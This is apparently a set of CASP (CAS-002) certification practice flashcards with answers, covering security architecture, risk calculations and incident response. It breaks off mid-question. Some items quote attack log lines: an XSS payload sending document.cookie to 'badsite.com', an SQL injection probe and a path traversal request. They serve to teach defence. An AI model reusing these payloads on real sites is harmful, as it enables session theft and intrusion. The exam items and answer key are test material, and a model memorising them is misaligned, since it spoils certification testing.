CASP Flashcards
An administrator wants to enable policy based flexible mandatory access controls on an open
source OS to prevent abnormal application modifications or executions. Which of the following
would BEST accomplish this?
A. Access control lists
B. SELinux
C. IPtables firewall
D. HIPS
B. SELinux
Company ABC’s SAN is nearing capacity and will cause costly downtime if servers run out of disk
space. Which of the following is a more cost effective alternative to buying a new SAN?
A. Enable multipath to increase availability
B. Enable deduplication on the storage pools
C. Implement snapshots to reduce virtual disk size
D. Implement replication to offsite datacenter
B. Enable deduplication on the storage pools
A systems administrator establishes a CIFS share on a UNIX device to share data to Windows
systems. The security authentication on the Windows domain is set to the highest level. Windows
users are stating that they cannot authenticate to the UNIX share. Which of the following settings
on the UNIX server would correct this problem?
A. Refuse LM and only accept NTLMv2
B. Accept only LM
C. Refuse NTLMv2 and accept LM
D. Accept only NTLM
A. Refuse LM and only accept NTLMv2
A security architect is designing a new infrastructure using both type 1 and type 2 virtual
machines. In addition to the normal complement of security controls (e.g. antivirus, host
hardening, HIPS/NIDS) the security architect needs to implement a mechanism to securely store
cryptographic keys used to sign code and code modules on the VMs. Which of the following will
meet this goal without requiring any hardware pass-through implementations?
A. vTPM
B. HSM
C. TPM
D. INE
A. vTPM
A user has a laptop configured with multiple operating system installations. The operating systems
are all installed on a single SSD, but each has its own partition and logical volume. Which of the
following is the BEST way to ensure confidentiality of individual operating system data?
A. Encryption of each individual partition
B. Encryption of the SSD at the file level
C. FDE of each logical volume on the SSD
D. FDE of the entire SSD as a single disk
A. Encryption of each individual partition
After being notified of an issue with the online shopping cart, where customers are able to
arbitrarily change the price of listed items, a programmer analyzes the following piece of code
used by a web based shopping cart.
SELECT ITEM FROM CART WHERE ITEM=ADDSLASHES($USERINPUT);
The programmer found that every time a user adds an item to the cart, a temporary file is created
in the web server’s /tmp directory. The temporary file’s name is generated by concatenating the
content of the $USERINPUT variable and a timestamp in the form MM-DD-YYYY
(e.g. smartphone-12-25-2013.tmp), and the file contains the price of the item being purchased. Which
of the following is MOST likely being exploited to manipulate the price of a shopping cart’s items?
A. Input validation
B. SQL injection
C. TOCTOU
D. Session hijacking
C. TOCTOU
The administrator is troubleshooting availability issues on an FCoE-based storage array that uses
deduplication. The single controller in the storage array has failed, so the administrator wants to
move the drives to a storage array from a different manufacturer in order to access the data.
Which of the following issues may potentially occur?
A. The data may not be in a usable format.
B. The new storage array is not FCoE based.
C. The data may need a file system check.
D. The new storage array also only has a single controller.
A. The data may not be in a usable format.
Joe, a hacker, has discovered he can craft a webpage that, when viewed in a browser, crashes the
browser and then allows him to gain remote code execution in the context of the victim’s privilege
level. The browser crashes due to an exception error when heap memory that is no longer in use is
accessed. Which of the following BEST describes the application issue?
A. Integer overflow
B. Click-jacking
CompTIA CAS-002 Exam
www.selftestengine.com 4
C. Race condition
D. SQL injection
E. Use after free
F. Input validation
E. Use after free
A developer is determining the best way to improve security within the code being developed. The
developer is focusing on input fields where customers enter their credit card details. Which of the
following techniques, if implemented in the code, would be the MOST effective in protecting the
fields from malformed input?
A. Client side input validation
B. Stored procedure
C. Encrypting credit card details
D. Regular expression matching
D. Regular expression matching
A security administrator was doing a packet capture and noticed a system communicating with an
unauthorized address within the 2001::/32 prefix. The network administrator confirms there is no
IPv6 routing into or out of the network. Which of the following is the BEST course of action?
A. Investigate the network traffic and block UDP port 3544 at the firewall
B. Remove the system from the network and disable IPv6 at the router
C. Locate and remove the unauthorized 6to4 relay from the network
D. Disable the switch port and block the 2001::/32 traffic at the firewall
A. Investigate the network traffic and block UDP port 3544 at the firewall
A security administrator notices the following line in a server’s security log:
document.location='http://badsite.com/?q='document.cookie') + "';
The administrator is concerned that it will take the developer a lot of time to fix the application that
is running on the server. Which of the following should the security administrator implement to
prevent this particular attack?
A. WAF
B. Input validation
C. SIEM
D. Sandboxing
E. DAM
A. WAF
A popular commercial virtualization platform allows for the creation of virtual hardware. To virtual
machines, this virtual hardware is indistinguishable from real hardware. By implementing
virtualized TPMs, which of the following trusted system concepts can be implemented?
A. Software-based root of trust
B. Continuous chain of trust
C. Chain of trust with a hardware root of trust
D. Software-based trust anchor with no root of trust
C. Chain of trust with a hardware root of trust
An organization is concerned with potential data loss in the event of a disaster, and created a
backup datacenter as a mitigation strategy. The current storage method is a single NAS used by
all servers in both datacenters. Which of the following options increases data availability in the
event of a datacenter failure?
A. Replicate NAS changes to the tape backups at the other datacenter.
B. Ensure each server has two HBAs connected through two routes to the NAS.
C. Establish deduplication across diverse storage paths.
D. Establish a SAN that replicates between datacenters.
D. Establish a SAN that replicates between datacenters.
An application present on the majority of an organization’s 1,000 systems is vulnerable to a buffer
overflow attack. Which of the following is the MOST comprehensive way to resolve the issue?
A. Deploy custom HIPS signatures to detect and block the attacks.
B. Validate and deploy the appropriate patch.
C. Run the application in terminal services to reduce the threat landscape.
D. Deploy custom NIPS signatures to detect and block the attacks.
B. Validate and deploy the appropriate patch.
select id, firstname, lastname from authors
User input= firstname= Hack;man lastname=Johnson
Which of the following types of attacks is the user attempting?
A. XML injection
B. Command injection
C. Cross-site scripting
D. SQL injection
D. SQL injection
A government agency considers confidentiality to be of utmost importance and availability issues
to be of least importance. Knowing this, which of the following correctly orders various
vulnerabilities in the order of MOST important to LEAST important?
A. Insecure direct object references, CSRF, Smurf
B. Privilege escalation, Application DoS, Buffer overflow
C. SQL injection, Resource exhaustion, Privilege escalation
D. CSRF, Fault injection, Memory leaks
A. Insecure direct object references, CSRF, Smurf
A security administrator wants to deploy a dedicated storage solution which is inexpensive, can
natively integrate with AD, allows files to be selectively encrypted and is suitable for a small
number of users at a satellite office. Which of the following would BEST meet the requirement?
A. SAN
B. NAS
C. Virtual SAN
D. Virtual storage
B. NAS
At 9:00 am each morning, all of the virtual desktops in a VDI implementation become extremely
slow and/or unresponsive. The outage lasts for around 10 minutes, after which everything runs
properly again. The administrator has traced the problem to a lab of thin clients that are all booted
at 9:00 am each morning. Which of the following is the MOST likely cause of the problem and the
BEST solution? (Select TWO).
A. Add guests with more memory to increase capacity of the infrastructure.
B. A backup is running on the thin clients at 9am every morning.
C. Install more memory in the thin clients to handle the increased load while booting.
D. Booting all the lab desktops at the same time is creating excessive I/O.
E. Install 10-Gb uplinks between the hosts and the lab to increase network capacity.
F. Install faster SSD drives in the storage system used in the infrastructure.
G. The lab desktops are saturating the network while booting.
H. The lab desktops are using more memory than is available to the host systems.
D. Booting all the lab desktops at the same time is creating excessive I/O.
F. Install faster SSD drives in the storage system used in the infrastructure.
A security administrator is shown the following log excerpt from a Unix system:
2013 Oct 10 07:14:57 web14 sshd[1632]: Failed password for root from 198.51.100.23 port 37914 ssh2
2013 Oct 10 07:14:57 web14 sshd[1635]: Failed password for root from 198.51.100.23 port 37915 ssh2
2013 Oct 10 07:14:58 web14 sshd[1638]: Failed password for root from 198.51.100.23 port 37916 ssh2
2013 Oct 10 07:15:59 web14 sshd[1640]: Failed password for root from 198.51.100.23 port 37918 ssh2
2013 Oct 10 07:16:00 web14 sshd[1641]: Failed password for root from 198.51.100.23 port 37920 ssh2
2013 Oct 10 07:16:00 web14 sshd[1642]: Successful login for root from 198.51.100.23 port 37924 ssh2
Which of the following is the MOST likely explanation of what is occurring and the BEST
immediate response? (Select TWO).
A. An authorized administrator has logged into the root account remotely.
B. The administrator should disable remote root logins.
C. Isolate the system immediately and begin forensic analysis on the host.
D. A remote attacker has compromised the root account using a buffer overflow in sshd.
E. A remote attacker has guessed the root password using a dictionary attack.
F. Use iptables to immediately DROP connections from the IP 198.51.100.23.
G. A remote attacker has compromised the private key of the root account.
H. Change the root password immediately to a password not found in a dictionary.
C. Isolate the system immediately and begin forensic analysis on the host.
E. A remote attacker has guessed the root password using a dictionary attack.
A security administrator wants to prevent sensitive data residing on corporate laptops and
desktops from leaking outside of the corporate network. The company has already implemented
full-disk encryption and has disabled all peripheral devices on its desktops and laptops. Which of
the following additional controls MUST be implemented to minimize the risk of data leakage?
(Select TWO).
A. A full-system backup should be implemented to a third-party provider with strong encryption for
data in transit.
B. A DLP gateway should be installed at the company border.
C. Strong authentication should be implemented via external biometric devices.
D. Full-tunnel VPN should be required for all network communication.
E. Full-drive file hashing should be implemented with hashes stored on separate storage.
F. Split-tunnel VPN should be enforced when transferring sensitive data.
B. A DLP gateway should be installed at the company border.
D. Full-tunnel VPN should be required for all network communication.
A developer has implemented a piece of client-side JavaScript code to sanitize a user’s provided
input to a web page login screen. The code ensures that only the upper case and lower case
letters are entered in the username field, and that only a 6-digit PIN is entered in the password
field. A security administrator is concerned with the following web server log:
10.235.62.11 - - [02/Mar/2014:06:13:04] "GET /site/script.php?user=admin&pass=pass%20or%201=1 HTTP/1.1" 200 5724
Given this log, which of the following is the security administrator concerned with and which fix
should be implemented by the developer?
A. The security administrator is concerned with nonprintable characters being used to gain
administrative access, and the developer should strip all nonprintable characters.
B. The security administrator is concerned with XSS, and the developer should normalize Unicode
characters on the browser side.
C. The security administrator is concerned with SQL injection, and the developer should
implement server side input validation.
D. The security administrator is concerned that someone may log on as the administrator, and the
developer should ensure strong passwords are enforced.
C. The security administrator is concerned with SQL injection, and the developer should
implement server side input validation.
The security administrator finds unauthorized tables and records, which were not present before,
on a Linux database server. The database server communicates only with one web server, which
connects to the database server via an account with SELECT only privileges. Web server logs
show the following:
90.76.165.40 - - [08/Mar/2014:10:54:04] "GET calendar.php?create%20table%20hidden HTTP/1.1" 200 5724
90.76.165.40 - - [08/Mar/2014:10:54:05] "GET ../../../root/.bash_history HTTP/1.1" 200 5724
90.76.165.40 - - [08/Mar/2014:10:54:04] "GET index.php?user=Create HTTP/1.1" 200 5724
The security administrator also inspects the following file system locations on the database server
using the command 'ls -al /root':
drwxrwxrwx 11 root root 4096 Sep 28 22:45 .
drwxr-xr-x 25 root root 4096 Mar 8 09:30 ..
-rws------ 25 root root 4096 Mar 8 09:30 .bash_history
-rw------- 25 root root 4096 Mar 8 09:30 .bash_history
-rw------- 25 root root 4096 Mar 8 09:30 .profile
-rw------- 25 root root 4096 Mar 8 09:30 .ssh
Which of the following attacks was used to compromise the database server and what can the
security administrator implement to detect such attacks in the future? (Select TWO).
A. Privilege escalation
B. Brute force attack
C. SQL injection
D. Cross-site scripting
E. Using input validation, ensure the following characters are sanitized: <>
F. Update crontab with: find / ( -perm -4000 ) -type f -print0 | xargs -0 ls -l | email.sh
G. Implement the following PHP directive: $clean_user_input = addslashes($user_input)
H. Set an account lockout policy
A. Privilege escalation
F. Update crontab with: find / ( -perm -4000 ) -type f -print0 | xargs -0 ls -l | email.sh
The risk manager has requested a security solution that is centrally managed, can easily be
updated, and protects end users’ workstations from both known and unknown malicious attacks
when connected to either the office or home network. Which of the following would BEST meet
this requirement?
A. HIPS
B. UTM
C. Antivirus
D. NIPS
E. DLP
A. HIPS
Which of the following describes a risk and mitigation associated with cloud data storage?
A. Risk: Shared hardware caused data leakage
Mitigation: Strong encryption at rest
B. Risk: Offsite replication
Mitigation: Multi-site backups
C. Risk: Data loss from de-duplication
Mitigation: Dynamic host bus addressing
D. Risk: Combined data archiving
Mitigation: Two-factor administrator authentication
A. Risk: Shared hardware caused data leakage
Mitigation: Strong encryption at rest
An insurance company is looking to purchase a smaller company in another country. Which of the
following tasks would the security administrator perform as part of the security due diligence?
A. Review switch and router configurations
B. Review the security policies and standards
C. Perform a network penetration test
D. Review the firewall rule set and IPS logs
B. Review the security policies and standards
A new piece of ransomware was installed on a company’s backup server. It encrypted the hard
drives containing the OS and the backup application configuration but did not affect the deduplication
data hard drives. During the incident response, the company finds that all backup tapes for this
server are also corrupt. Which of the following is the PRIMARY concern?
A. Determining how to install HIPS across all server platforms to prevent future incidents
B. Preventing the ransomware from re-infecting the server upon restore
C. Validating the integrity of the deduplicated data
D. Restoring the data will be difficult without the application configuration
D. Restoring the data will be difficult without the application configuration
The Chief Executive Officer (CEO) of a large prestigious enterprise has decided to reduce
business costs by outsourcing to a third party company in another country. Functions to be
outsourced include: business analysts, testing, software development and back office functions
that deal with the processing of customer data. The Chief Risk Officer (CRO) is concerned about
the outsourcing plans. Which of the following risks are MOST likely to occur if adequate controls
are not implemented?
A. Geographical regulation issues, loss of intellectual property and interoperability agreement
issues
B. Improper handling of client data, interoperability agreement issues and regulatory issues
C. Cultural differences, increased cost of doing business and divestiture issues
D. Improper handling of customer data, loss of intellectual property and reputation damage
D. Improper handling of customer data, loss of intellectual property and reputation damage
A security analyst has been asked to develop a quantitative risk analysis and risk assessment for
the company’s online shopping application. Based on heuristic information from the Security
Operations Center (SOC), a Denial of Service (DoS) attack has been successfully executed 5
times a year. The Business Operations department has determined that the loss associated with each
attack is $40,000. After implementing application caching, the number of DoS attacks was reduced
to one time a year. The cost of the countermeasures was $100,000. Which of the following is the
monetary value earned during the first year of operation?
A. $60,000
B. $100,000
C. $140,000
D. $200,000
A. $60,000
The Information Security Officer (ISO) is reviewing new policies that have been recently made
effective and now apply to the company. Upon review, the ISO identifies a new requirement to
implement two-factor authentication on the company’s wireless system. Due to budget constraints,
the company will be unable to implement the requirement for the next two years. The ISO is
required to submit a policy exception form to the Chief Information Officer (CIO). Which of the
following are MOST important to include when submitting the exception form? (Select THREE).
A. Business or technical justification for not implementing the requirements.
B. Risks associated with the inability to implement the requirements.
C. Industry best practices with respect to the technical implementation of the current controls.
D. All sections of the policy that may justify non-implementation of the requirements.
E. A revised DRP and COOP plan to the exception form.
F. Internal procedures that may justify a budget submission to implement the new requirement.
G. Current and planned controls to mitigate the risks.
A. Business or technical justification for not implementing the requirements.
B. Risks associated with the inability to implement the requirements.
G. Current and planned controls to mitigate the risks.
The Chief Information Officer (CIO) is reviewing the IT-centric BIA and RA documentation. The
documentation shows that a single 24-hour downtime in a critical business function will cost the
business $2.3 million. Additionally, the business unit which depends on the critical business
function has determined that there is a high probability that a threat will materialize based on
historical data. The CIO’s budget does not allow for full system hardware replacement in case of a
catastrophic failure, nor does it allow for the purchase of additional compensating controls. Which
of the following should the CIO recommend to the finance director to minimize financial loss?
A. The company should mitigate the risk.
B. The company should transfer the risk.
C. The company should avoid the risk.
D. The company should accept the risk.
B. The company should transfer the risk.
A company is in the process of outsourcing its customer relationship management system to a
cloud provider. It will host the entire organization’s customer database. The database will be
accessed by both the company’s users and its customers. The procurement department has
asked what security activities must be performed for the deal to proceed. Which of the following
are the MOST appropriate security activities to be performed as part of due diligence? (Select
TWO).
A. Physical penetration test of the datacenter to ensure there are appropriate controls.
B. Penetration testing of the solution to ensure that the customer data is well protected.
C. Security clauses are implemented into the contract such as the right to audit.
D. Review of the organization’s security policies, procedures and relevant hosting certifications.
E. Code review of the solution to ensure that there are no back doors located in the software.
C. Security clauses are implemented into the contract such as the right to audit.
D. Review of the organization’s security policies, procedures and relevant hosting certifications.
An organization is selecting a SaaS provider to replace its legacy, in-house Customer Resource
Management (CRM) application. Which of the following ensures the organization mitigates the risk
of managing separate user credentials?
A. Ensure the SaaS provider supports dual factor authentication.
B. Ensure the SaaS provider supports encrypted password transmission and storage.
C. Ensure the SaaS provider supports secure hash file exchange.
D. Ensure the SaaS provider supports role-based access control.
E. Ensure the SaaS provider supports directory services federation.
E. Ensure the SaaS provider supports directory services federation.
After a security incident, an administrator would like to implement policies that would help reduce
fraud and the potential for collusion between employees. Which of the following would help meet
these goals by having co-workers occasionally audit another worker’s position?
A. Least privilege
B. Job rotation
C. Mandatory vacation
D. Separation of duties
B. Job rotation
A large organization has recently suffered a massive credit card breach. During the months of
incident response, there were multiple attempts to assign blame for the incident. In which part of
the incident response process would this be addressed in a controlled and productive manner?
A. During the Identification Phase
B. During the Lessons Learned phase
C. During the Containment Phase
D. During the Preparation Phase
B. During the Lessons Learned phase
A security manager for a service provider has approved two vendors for connections to the service
provider backbone. One vendor will be providing authentication services for its payment card
service, and the other vendor will be providing maintenance to the service provider infrastructure
sites. Which of the following business agreements is MOST relevant to the vendors and service
provider’s relationship?
A. Memorandum of Agreement
B. Interconnection Security Agreement
C. Non-Disclosure Agreement
D. Operating Level Agreement
B. Interconnection Security Agreement
A large enterprise acquires another company which uses antivirus from a different vendor. The
CISO has requested that data feeds from the two different antivirus platforms be combined in a
way that allows management to assess and rate the overall effectiveness of antivirus across the
entire organization. Which of the following tools can BEST meet the CISO’s requirement?
A. GRC
B. IPS
C. CMDB
D. Syslog-ng
E. IDS
A. GRC
Which of the following provides the BEST risk calculation methodology?
A. Annual Loss Expectancy (ALE) x Value of Asset
B. Potential Loss x Event Probability x Control Failure Probability
C. Impact x Threat x Vulnerability
D. Risk Likelihood x Annual Loss Expectancy (ALE)
B. Potential Loss x Event Probability x Control Failure Probability
A security policy states that all applications on the network must have a password length of eight
characters. There are three legacy applications on the network that cannot meet this policy. One
system will be upgraded in six months, and two are not expected to be upgraded or removed from
the network. Which of the following processes should be followed?
A. Establish a risk matrix
B. Inherit the risk for six months
C. Provide a business justification to avoid the risk
D. Provide a business justification for a risk exception
D. Provide a business justification for a risk exception
The senior security administrator wants to redesign the company DMZ to minimize the risks
associated with both external and internal threats. The DMZ design must support security in depth,
change management and configuration processes, and support incident reconstruction. Which of
the following designs BEST supports the given requirements?
A. A dual firewall DMZ with remote logging where each firewall is managed by a separate
administrator.
B. A single firewall DMZ where each firewall interface is managed by a separate administrator and
logging to the cloud.
C. A SaaS based firewall which logs to the company’s local storage via SSL, and is managed by
the change control team.
D. A virtualized firewall, where each virtual instance is managed by a separate administrator and
logging to the same hardware.
A. A dual firewall DMZ with remote logging where each firewall is managed by a separate
administrator.
A large hospital has implemented BYOD to allow doctors and specialists the ability to access
patient medical records on their tablets. The doctors and specialists access patient records over
the hospital’s guest WiFi network which is isolated from the internal network with appropriate
security controls. The patient records management system can be accessed from the guest
network and requires two-factor authentication. Using a remote desktop-type interface, the doctors
and specialists can interact with the hospital’s system. Cut and paste and printing functions are
disabled to prevent the copying of data to BYOD devices. Which of the following are of MOST
concern? (Select TWO).
A. Privacy could be compromised as patient records can be viewed in uncontrolled areas.
B. Device encryption has not been enabled and will result in a greater likelihood of data loss.
C. The guest WiFi may be exploited allowing non-authorized individuals access to confidential
patient data.
D. Malware may be on BYOD devices which can extract data via key logging and screen scrapes.
E. Remote wiping of devices should be enabled to ensure any lost device is rendered inoperable.
A. Privacy could be compromised as patient records can be viewed in uncontrolled areas.
D. Malware may be on BYOD devices which can extract data via key logging and screen scrapes.
The Chief Information Security Officer (CISO) at a company knows that many users store
business documents on public cloud-based storage, and realizes this is a risk to the company. In
response, the CISO implements a mandatory training course in which all employees are instructed
on the proper use of cloud-based storage. Which of the following risk strategies did the CISO
implement?
A. Avoid
B. Accept
C. Mitigate
D. Transfer
C. Mitigate
A forensic analyst receives a hard drive containing malware quarantined by the antivirus
application. After creating an image and determining the directory location of the malware file,
which of the following helps to determine when the system became infected?
A. The malware file’s modify, access, change time properties.
B. The timeline analysis of the file system.
C. The time stamp of the malware in the swap file.
D. The date/time stamp of the malware detection in the antivirus logs.
B. The timeline analysis of the file system.
The Chief Executive Officer (CEO) of a company that allows telecommuting has challenged the
Chief Security Officer’s (CSO) request to harden the corporate network’s perimeter. The CEO
argues that the company cannot protect its employees at home, so the risk at work is no different.
Which of the following BEST explains why this company should proceed with protecting its
corporate network boundary?
A. The corporate network is the only network that is audited by regulators and customers.
B. The aggregation of employees on a corporate network makes it a more valuable target for
attackers.
C. Home networks are unknown to attackers and less likely to be targeted directly.
D. Employees are more likely to be using personal computers for general web browsing when they
are at home.
B. The aggregation of employees on a corporate network makes it a more valuable target for
attackers.
A security officer is leading a lessons learned meeting. Which of the following should be
components of that meeting? (Select TWO).
A. Demonstration of IPS system
B. Review vendor selection process
C. Calculate the ALE for the event
D. Discussion of event timeline
E. Assigning of follow up items
D. Discussion of event timeline
E. Assigning of follow up items
An assessor identifies automated methods for identifying security control compliance through
validating sensors at the endpoint and at Tier 2. Which of the following practices satisfy continuous
monitoring of authorized information systems?
A. Independent verification and validation
B. Security test and evaluation
C. Risk assessment
D. Ongoing authorization
D. Ongoing authorization
The source workstation image for new accounting PCs has begun blue-screening. A technician
notices that the date/time stamp of the image source appears to have changed. The desktop
support director has asked the Information Security department to determine if any changes were
made to the source image. Which of the following methods would BEST help with this process?
(Select TWO).
A. Retrieve source system image from backup and run file comparison analysis on the two
images.
B. Parse all images to determine if extra data is hidden using steganography.
C. Calculate a new hash and compare it with the previously captured image hash.
D. Ask desktop support if any changes to the images were made.
E. Check key system files to see if date/time stamp is in the past six months.
A. Retrieve source system image from backup and run file comparison analysis on the two
images.
C. Calculate a new hash and compare it with the previously captured image hash.
A software project manager has been provided with a requirement from the customer to place
limits on the types of transactions a given user can initiate without external interaction from
another user with elevated privileges. This requirement is BEST described as an implementation
of:
A. an administrative control
B. dual control
C. separation of duties
D. least privilege
E. collusion
C. separation of duties
The technology steering committee is struggling with increased requirements stemming from an
increase in telecommuting. The organization has not addressed telecommuting in the past. The
implementation of a new SSL-VPN and a VOIP phone solution enables personnel to work from
remote locations with corporate assets. Which of the following steps must the committee take
FIRST to outline senior management’s directives?
A. Develop an information classification scheme that will properly secure data on corporate
systems.
B. Implement database views and constrained interfaces so remote users will be unable to access
PII from personal equipment.
C. Publish a policy that addresses the security requirements for working remotely with company
equipment.
D. Work with mid-level managers to identify and document the proper procedures for
telecommuting.
C. Publish a policy that addresses the security requirements for working remotely with company
equipment.
A company is facing penalties for failing to effectively comply with e-discovery requests. Which of
the following could reduce the overall risk to the company from this issue?
A. Establish a policy that only allows filesystem encryption and disallows the use of individual file
encryption.
B. Require each user to log passwords used for file encryption to a decentralized repository.
C. Permit users to only encrypt individual files using their domain password and archive all old
user passwords.
D. Allow encryption only by tools that use public keys from the existing escrowed corporate PKI.
D. Allow encryption only by tools that use public keys from the existing escrowed corporate PKI.
There have been some failures of the company’s internal facing website. A security engineer has
found the WAF to be the root cause of the failures. System logs show that the WAF has been
unavailable for 14 hours over the past month, in four separate situations. One of these situations
was a two hour scheduled maintenance time, aimed at improving the stability of the WAF. Using
the MTTR based on the last month’s performance figures, which of the following calculations is the
percentage of uptime assuming there were 722 hours in the month?
A. 92.24 percent
B. 98.06 percent
C. 98.34 percent
D. 99.72 percent
C. 98.34 percent
A security firm is writing a response to an RFP from a customer that is building a new network
based software product. The firm’s expertise is in penetration testing corporate networks. The RFP
explicitly calls for all possible behaviors of the product to be tested; however, it does not specify
any particular method to achieve this goal. Which of the following should be used to ensure the
security and functionality of the product? (Select TWO).
A. Code review
B. Penetration testing
C. Grey box testing
D. Code signing
E. White box testing
A. Code review
E. White box testing
Company XYZ has purchased and is now deploying a new HTML5 application. The company
wants to hire a penetration tester to evaluate the security of the client and server components of
the proprietary web application before launch. Which of the following is the penetration tester
MOST likely to use while performing black box testing of the security of the company’s purchased
application? (Select TWO).
A. Code review
B. Sandbox
C. Local proxy
D. Fuzzer
E. Port scanner
C. Local proxy
D. Fuzzer
The Information Security Officer (ISO) believes that the company has been targeted by
cybercriminals and it is under a cyber attack. Internal services that are normally available to the
public via the Internet are inaccessible, and employees in the office are unable to browse the
Internet. The senior security engineer starts by reviewing the bandwidth at the border router, and
notices that the incoming bandwidth on the router’s external interface is maxed out. The security
engineer then inspects the following piece of log to try and determine the reason for the downtime,
focusing on the company’s external router’s IP which is 128.20.176.19:
11:16:22.110343 IP 90.237.31.27.19 > 128.20.176.19.19: UDP, length 1400
11:16:22.110351 IP 23.27.112.200.19 > 128.20.176.19.19: UDP, length 1400
11:16:22.110358 IP 192.200.132.213.19 > 128.20.176.19.19: UDP, length 1400
11:16:22.110402 IP 70.192.2.55.19 > 128.20.176.19.19: UDP, length 1400
11:16:22.110406 IP 112.201.7.39.19 > 128.20.176.19.19: UDP, length 1400
Which of the following describes the findings the senior security engineer should report to the ISO
and the BEST solution for service restoration?
A. After the senior engineer used a network analyzer to identify an active Fraggle attack, the
company’s ISP should be contacted and instructed to block the malicious packets.
B. After the senior engineer used the above IPS logs to detect the ongoing DDOS attack, an IPS
filter should be enabled to block the attack and restore communication.
C. After the senior engineer used a mirror port to capture the ongoing amplification attack, a BGP
sinkhole should be configured to drop traffic at the source networks.
D. After the senior engineer used a packet capture to identify an active Smurf attack, an ACL
should be placed on the company’s external router to block incoming UDP port 19 traffic.
A. After the senior engineer used a network analyzer to identify an active Fraggle attack, the
company’s ISP should be contacted and instructed to block the malicious packets.
An external penetration tester compromised one of the client organization’s authentication servers
and retrieved the password database. Which of the following methods allows the penetration
tester to MOST efficiently use any obtained administrative credentials on the client organization’s
other systems, without impacting the integrity of any of the systems?
A. Use the pass the hash technique
B. Use rainbow tables to crack the passwords
C. Use the existing access to change the password
D. Use social engineering to obtain the actual password
A. Use the pass the hash technique
A web services company is planning a one-time high-profile event to be hosted on the corporate
website. An outage, due to an attack, would be publicly embarrassing, so Joe, the Chief Executive
Officer (CEO), has requested that his security engineers put temporary preventive controls in
place. Which of the following would MOST appropriately address Joe’s concerns?
A. Ensure web services hosting the event use TCP cookies and deny_hosts.
B. Configure an intrusion prevention system that blocks IPs after detecting too many incomplete
sessions.
C. Contract and configure scrubbing services with third-party DDoS mitigation providers.
D. Purchase additional bandwidth from the company’s Internet service provider.
C. Contract and configure scrubbing services with third-party DDoS mitigation providers.
The Chief Executive Officer (CEO) of an Internet service provider (ISP) has decided to limit the
company’s contribution to worldwide Distributed Denial of Service (DDoS) attacks. Which of the
following should the ISP implement? (Select TWO).
A. Block traffic from the ISP’s networks destined for blacklisted IPs.
B. Prevent the ISP’s customers from querying DNS servers other than those hosted by the ISP.
C. Scan the ISP’s customer networks using an up-to-date vulnerability scanner.
D. Notify customers when services they run are involved in an attack.
E. Block traffic with an IP source not allocated to customers from exiting the ISP’s network.
D. Notify customers when services they run are involved in an attack.
E. Block traffic with an IP source not allocated to customers from exiting the ISP’s network.
Due to compliance regulations, a company requires a yearly penetration test. The Chief
Information Security Officer (CISO) has asked that it be done under a black box methodology.
Which of the following would be the advantage of conducting this kind of penetration test?
A. The risk of unplanned server outages is reduced.
B. Using documentation provided to them, the pen-test organization can quickly determine areas
to focus on.
C. The results will show an in-depth view of the network and should help pin-point areas of internal
weakness.
D. The results should reflect what attackers may be able to learn about the company.
D. The results should reflect what attackers may be able to learn about the company.
Ann, a systems engineer, is working to identify an unknown node on the corporate network. To
begin her investigative work, she runs the following nmap command string:
user@hostname:~$ sudo nmap -O 192.168.1.54
Based on the output, nmap is unable to identify the OS running on the node, but the following
ports are open on the device:
TCP/22
TCP/111
TCP/512-514
TCP/2049
TCP/32778
Based on this information, which of the following operating systems is MOST likely running on the
unknown node?
A. Linux
B. Windows
C. Solaris
D. OSX
C. Solaris
A security engineer is responsible for monitoring company applications for known vulnerabilities.
Which of the following is a way to stay current on exploits and information security news?
A. Update company policies and procedures
B. Subscribe to security mailing lists
C. Implement security awareness training
D. Ensure that the organization vulnerability management plan is up-to-date
B. Subscribe to security mailing lists
The Chief Executive Officer (CEO) of a small start-up company wants to set up offices around the
country for the sales staff to generate business. The company needs an effective communication
solution to remain in constant contact with each other, while maintaining a secure business
environment. A junior-level administrator suggests that the company and the sales staff stay
connected via free social media. Which of the following decisions is BEST for the CEO to make?
A. Social media is an effective solution because it is easily adaptable to new situations.
B. Social media is an ineffective solution because the policy may not align with the business.
C. Social media is an effective solution because it implements SSL encryption.
D. Social media is an ineffective solution because it is not primarily intended for business
applications.
B. Social media is an ineffective solution because the policy may not align with the business.
News outlets are beginning to report on a number of retail establishments that are experiencing
payment card data breaches. The data exfiltration is enabled by malware on a compromised
computer. After the initial exploit, network mapping and fingerprinting are conducted to prepare for
further exploitation. Which of the following is the MOST effective solution to protect against
unrecognized malware infections?
A. Remove local admin permissions from all users and change anti-virus to a cloud aware, push
technology.
B. Implement an application whitelist at all levels of the organization.
C. Deploy a network based heuristic IDS, configure all layer 3 switches to feed data to the IDS for
more effective monitoring.
D. Update router configuration to pass all network traffic through a new proxy server with
advanced malware detection.
B. Implement an application whitelist at all levels of the organization.
A security administrator notices a recent increase in workstations becoming compromised by
malware. Often, the malware is delivered via drive-by downloads, from malware hosting websites,
and is not being detected by the corporate antivirus. Which of the following solutions would
provide the BEST protection for the company?
A. Increase the frequency of antivirus downloads and install updates to all workstations.
B. Deploy a cloud-based content filter and enable the appropriate category to prevent further
infections.
C. Deploy a WAF to inspect and block all web traffic which may contain malware and exploits.
D. Deploy a web based gateway antivirus server to intercept viruses before they enter the
network.
B. Deploy a cloud-based content filter and enable the appropriate category to prevent further
infections.
A security administrator wants to calculate the ROI of a security design which includes the
purchase of new equipment. The equipment costs $50,000 and it will take 50 hours to install and
configure the equipment. The administrator plans to hire a contractor at a rate of $100/hour to do
the installation. Given that the new design and equipment will allow the company to increase
revenue and make an additional $100,000 on the first year, which of the following is the ROI
expressed as a percentage for the first year?
A. -45 percent
B. 5.5 percent
C. 45 percent
D. 82 percent
D. 82 percent
A new internal network segmentation solution will be implemented into the enterprise that consists
of 200 internal firewalls. As part of running a pilot exercise, it was determined that it takes three
changes to deploy a new application onto the network before it is operational. Security now has a
significant effect on overall availability. Which of the following would be the FIRST process to
perform as a result of these findings?
A. Lower the SLA to a more tolerable level and perform a risk assessment to see if the solution
could be met by another solution. Reuse the firewall infrastructure on other projects.
B. Perform a cost benefit analysis and implement the solution as it stands as long as the risks are
understood by the business owners around the availability issues. Decrease the current SLA
expectations to match the new solution.
C. Engage internal auditors to perform a review of the project to determine why and how the
project did not meet the security requirements. As part of the review ask them to review the control
effectiveness.
D. Review to determine if control effectiveness is in line with the complexity of the solution.
Determine if the requirements can be met with a simpler solution.
D. Review to determine if control effectiveness is in line with the complexity of the solution.
Determine if the requirements can be met with a simpler solution.
A Chief Financial Officer (CFO) has raised concerns with the Chief Information Security Officer
(CISO) because money has been spent on IT security infrastructure, but corporate assets are still
found to be vulnerable. The business recently funded a patch management product and SOE
